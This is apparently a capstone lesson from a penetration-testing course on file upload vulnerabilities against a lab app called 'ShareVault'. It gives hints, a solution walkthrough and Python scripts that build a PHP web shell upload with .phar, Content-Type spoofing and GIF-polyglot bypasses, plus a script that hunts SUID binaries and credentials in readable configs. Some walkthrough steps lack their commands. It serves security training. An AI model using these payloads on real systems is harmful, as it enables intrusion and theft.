This capstone challenge brings together everything you have learned throughout this course. You will conduct a full-scope file upload assessment against a multi-layered target application. The challenge tests your ability to identify, exploit, and document file upload vulnerabilities in a realistic scenario that mirrors professional penetration testing engagements.
You have been engaged to perform a web application penetration test against a file-sharing platform called 'ShareVault.' The application allows users to upload and share files with other users. Your scope includes the entire application, and you have been provided with a standard user account.
The application has the following features: user registration and login, file upload with sharing, file preview, admin panel (which you should not have access to), and a public API. Your goal is to achieve remote code execution on the server through the file upload functionality.
Start the challenge environment:
If you get stuck, use these hints in order. Try to solve each step on your own before reading the next hint.
Hint 1: The application has three upload endpoints: the main file upload, the avatar upload, and the API upload. Each has different validation. Start by testing each one with a simple PHP web shell and observe the different responses.
Hint 2: The main file upload checks both the file extension AND the Content-Type header. The avatar upload only checks the file extension. The API upload checks the file's magic bytes. You will need a different bypass technique for each.
Hint 3: For the avatar upload, try alternative extensions. For the main upload, try spoofing the Content-Type. For the API upload, try prepending valid image magic bytes to your PHP code. One of these will work.
Hint 4: Once you achieve RCE, the flag is at /root/flag.txt. You may need to check file permissions: the web server runs as www-data, so you might need to find a way to read files owned by root. Check for SUID binaries or readable configuration files that might contain credentials.
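The post-exploitation checks in Hint 4 (setuid/setgid binaries, and root-owned files that www-data can still read and that may hold credentials) as a small triage script. This is an added example, not code from the course or the ShareVault target; the sample file list, modes and config contents are constructed stand-ins for what you would get from lstat() and cat on the real host, and the credential regex is a heuristic, not a complete list of key names.

```python
import os
import re
import stat

# Heuristic for credential-looking assignments in config files; constructed for this example.
CRED_RE = re.compile(r"\b(password|passwd|db_pass|secret|api_key|token)\b\s*[=:]", re.I)


def walk_entries(root):
    """Yield (path, mode, uid) for every regular file under root, like `find root -type f`."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:  # directories www-data cannot read are skipped, as find would report
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode, st.st_uid


def privileged_binaries(entries):
    r"""Equivalent of `find / -type f \( -perm -4000 -o -perm -2000 \)`: setuid/setgid files."""
    hits = []
    for path, mode, uid in entries:
        bits = [name for name, flag in (("suid", stat.S_ISUID), ("sgid", stat.S_ISGID)) if mode & flag]
        if bits:
            hits.append((path, uid, "+".join(bits)))
    return hits


def world_readable_root_files(entries):
    """Root-owned, non-executable files whose other-read bit is set: www-data can cat these.

    Executables are excluded (0o111) so the list is data files such as configs, not /usr/bin.
    """
    return [path for path, mode, uid in entries
            if uid == 0 and mode & stat.S_IROTH and not mode & 0o111]


def credential_lines(path, text):
    """Lines in a config file that look like credential assignments."""
    return [(path, line.strip()) for line in text.splitlines() if CRED_RE.search(line)]


# Constructed stand-in for lstat() output on a target: (path, S_IFREG | permission bits, uid).
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),            # ordinary setuid-root binary
    ("/usr/local/bin/backup", 0o104755, 0),      # custom setuid-root binary: worth a closer look
    ("/usr/bin/wall", 0o102755, 0),              # setgid, not setuid
    ("/var/www/html/config.php", 0o100644, 0),   # root-owned but world-readable
    ("/root/flag.txt", 0o100600, 0),             # root-owned, not readable by www-data
    ("/var/www/html/index.php", 0o100644, 33),   # owned by www-data (uid 33)
]
# Constructed contents of the readable config file.
SAMPLE_CONFIG = {
    "/var/www/html/config.php":
        "<?php\n$db_host = 'localhost';\n$db_user = 'sharevault';\n$db_pass = 'example';\n",
}


def triage(entries=SAMPLE_ENTRIES, files=SAMPLE_CONFIG):
    """Run the three checks and return what a tester would note before attempting escalation."""
    readable = world_readable_root_files(entries)
    creds = [hit for path in readable if path in files
             for hit in credential_lines(path, files[path])]
    return {"privileged": privileged_binaries(entries), "readable_root": readable, "credentials": creds}


if __name__ == "__main__":
    # On a real host: triage(list(walk_entries("/")), {p: open(p).read() for p in ...}) after
    # reading the files the readable_root list reports.
    for key, value in triage().items():
        print(key, value)
```

The setuid list is only a starting point: a standard binary such as passwd is expected, while an unfamiliar setuid-root binary in /usr/local/bin is the one to inspect. Credentials found in a readable config usually lead to a database or another account rather than straight to root, so expect to chain them.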
Only read this section after attempting the challenge yourself. The solution demonstrates the complete methodology.
Step 1: Register an account and log in. Explore the application to find all upload endpoints: /upload.php (main), /profile/avatar.php (avatar), and /api/v1/upload (API).
Step 2: Test each endpoint with a basic PHP web shell (shell.php). Observe the responses:
Step 3: The avatar upload only checks the extension. Try alternative PHP extensions:
Step 4: Request the uploaded web shell and execute commands. Confirm execution with a harmless command first (for example id, which should report www-data) before going after the flag:
Step 5: Document the finding. The avatar upload endpoint used an incomplete extension blocklist that did not include .phar, and PHP 8.1 on this server is configured to execute .phar files, so the uploaded file ran as PHP and gave remote code execution. Record the endpoint, the exact request that was accepted, and the evidence of execution.
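The three checks from Hint 2 and the bypasses from Hint 3, reproduced as a local model so the reasoning behind Steps 2 to 5 can be seen without the lab running. This is an added example, not the course's or ShareVault's code: the allowlist, the avatar denylist (the page only says it missed .phar), the set of extensions the PHP handler executes (the page only confirms .phar), the web shell bytes and the multipart boundary are all assumptions. It builds the multipart body Burp would send, feeds it to a validator per endpoint, and reports whether each attempt is accepted and whether the stored name would be handed to PHP.

```python
import re

# Minimal PHP web shell used as the payload (the page's "shell.php"); the exact
# bytes are not given on the page, so this one-liner is an assumption.
WEB_SHELL = b"<?php system($_GET['cmd']); ?>\n"

# Constructed boundary; a browser or Burp would generate a random one.
BOUNDARY = b"----ShareVaultBoundary"

# What each check consults. The lists are assumptions: the page only states which
# property each endpoint checks and that the avatar list missed .phar.
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}
IMAGE_MIMES = {"image/jpeg", "image/png", "image/gif"}
AVATAR_DENYLIST = {"php", "php3", "php4", "php5", "phtml"}
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
# Extensions the web server hands to PHP (assumed; the page confirms .phar is executed).
PHP_HANDLER_EXTS = {"php", "phtml", "phar"}


def build_multipart(field, filename, content_type, data, boundary=BOUNDARY):
    """Build the multipart/form-data body that a browser or Burp Repeater would send."""
    return (
        b"--" + boundary + b"\r\n"
        + b'Content-Disposition: form-data; name="' + field.encode() + b'"; filename="'
        + filename.encode() + b'"\r\n'
        + b"Content-Type: " + content_type.encode() + b"\r\n\r\n"
        + data + b"\r\n"
        + b"--" + boundary + b"--\r\n"
    )


_PART_RE = re.compile(rb'filename="([^"]*)"\r\nContent-Type: ([^\r\n]+)\r\n\r\n(.*?)\r\n--', re.S)


def parse_part(body):
    """Extract (filename, part Content-Type, bytes): the three things the endpoints look at."""
    m = _PART_RE.search(body)
    if m is None:
        raise ValueError("no file part in body")
    return m.group(1).decode(), m.group(2).decode(), m.group(3)


def extension(filename):
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def main_upload(body):
    """/upload.php: extension allowlist AND part Content-Type allowlist (Hint 2)."""
    filename, ctype, _ = parse_part(body)
    if extension(filename) not in IMAGE_EXTS:
        return False, "extension rejected"
    if ctype not in IMAGE_MIMES:
        return False, "content-type rejected"
    return True, "stored"


def avatar_upload(body):
    """/profile/avatar.php: extension denylist only (Hint 2); .phar is not on it (Step 5)."""
    filename, _, _ = parse_part(body)
    if extension(filename) in AVATAR_DENYLIST:
        return False, "extension rejected"
    return True, "stored"


def api_upload(body):
    """/api/v1/upload: magic bytes only; filename and Content-Type are ignored (Hint 2)."""
    _, _, data = parse_part(body)
    if not data.startswith(IMAGE_MAGIC):
        return False, "magic bytes rejected"
    return True, "stored"


ENDPOINTS = {"main": main_upload, "avatar": avatar_upload, "api": api_upload}

# The bypasses from Hint 3 plus two baselines (plain shell, shell renamed to .jpg).
ATTEMPTS = {
    "plain": ("shell.php", "application/x-php", WEB_SHELL),
    "renamed_jpg": ("shell.jpg", "image/jpeg", WEB_SHELL),
    "spoofed_ctype": ("shell.php", "image/jpeg", WEB_SHELL),
    "alt_extension": ("shell.phar", "application/octet-stream", WEB_SHELL),
    # GIF89a header followed by PHP: passes a magic-byte check, and PHP echoes the
    # leading bytes as output before executing the <?php block.
    "magic_polyglot": ("shell.php", "image/gif", b"GIF89a" + WEB_SHELL),
}


def run_attempts():
    """Return {(endpoint, attempt): (accepted, executes_as_php, reason)}."""
    results = {}
    for attempt, (filename, ctype, data) in ATTEMPTS.items():
        body = build_multipart("file", filename, ctype, data)
        for name, endpoint in ENDPOINTS.items():
            accepted, reason = endpoint(body)
            executes = accepted and extension(filename) in PHP_HANDLER_EXTS
            results[(name, attempt)] = (accepted, executes, reason)
    return results


if __name__ == "__main__":
    for (name, attempt), (accepted, executes, reason) in sorted(run_attempts().items()):
        print(f"{name:6} {attempt:14} accepted={accepted!s:5} executes={executes!s:5} ({reason})")
```

Two results are worth noting. Spoofing the Content-Type on the main endpoint fails because the extension allowlist runs as well, and renaming the shell to .jpg is accepted by two endpoints but never reaches the PHP handler: an accepted upload is only half the finding. The model reports the polyglot as accepted by the API because that is all the magic-byte check sees; on the real target, whether that stored file is served through PHP depends on where and under what name the API saves it, which is why Step 2 tells you to observe each response rather than assume.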
Congratulations on completing the File Upload Vulnerabilities course! You have learned the complete lifecycle of file upload security: from understanding how uploads work at the HTTP level, to identifying and exploiting vulnerabilities using multiple bypass techniques, to implementing comprehensive defenses and writing professional reports.
Here is a summary of the key skills you have mastered:
| Skill | Lesson(s) | Proficiency |
|---|---|---|
| Understanding file upload mechanics | 2 | ✓ Complete |
| Identifying attack vectors | 3 | ✓ Complete |
| Bypassing client-side validation | 4 | ✓ Complete |
| Bypassing server-side validation | 5 | ✓ Complete |
| Using Burp Suite for upload testing | 6 | ✓ Complete |
| Advanced bypass techniques | 7 | ✓ Complete |
| Framework-specific upload security | 8 | ✓ Complete |
| Implementing secure upload defenses | 9 | ✓ Complete |
| Hands-on exploitation methodology | 10 | ✓ Complete |
| Professional reporting and incident response | 11 | ✓ Complete |
| Full-scope assessment capability | 12 | ✓ Complete |
Tip: Continue practicing on platforms like HackTheBox, TryHackMe, and PortSwigger Web Academy. File upload vulnerabilities appear in virtually every web application; the more you practice, the faster you will identify them during real engagements.
Remember: with great power comes great responsibility. The skills you have learned in this course are powerful โ use them ethically, always with proper authorization, and always to make the digital world more secure. Happy hunting!